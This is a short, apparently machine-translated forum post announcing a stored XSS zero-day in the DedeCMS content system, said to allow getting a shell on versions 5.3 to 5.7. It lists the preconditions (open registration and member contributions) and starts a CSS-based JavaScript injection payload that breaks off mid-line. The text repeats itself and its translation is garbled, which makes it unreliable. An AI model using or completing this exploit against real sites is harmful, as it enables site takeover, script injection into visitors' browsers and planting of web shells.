Dedecmsxssoday: Kill all versions (T00ls first launched) byharis Author: haris vulnerability cause: Due to the lax filtering of the editor, malicious scripts will run. Currently, getshell has only tested versions 5.3 to 5.7. You can use other earlier versions as needed. The following describes how to use it. There are two conditions: 1. enable registration 2. Enable contribution note
DEdEcms xss oday kills all versions (T00LsFirst release) by haris
Author: haris
Vulnerability cause: malicious scripts run due to lax filtering of the editor. Getshell
Only versions 5.3 to 5.7 have been tested. You can use other earlier versions as needed.
The following describes how to use it.
There are two conditions:
1. enable registration
2. Enable contribution
Registered Member-post
Content:
Create XSS. Css
Body {
2 background-image: url (
'Javascript: document.Write("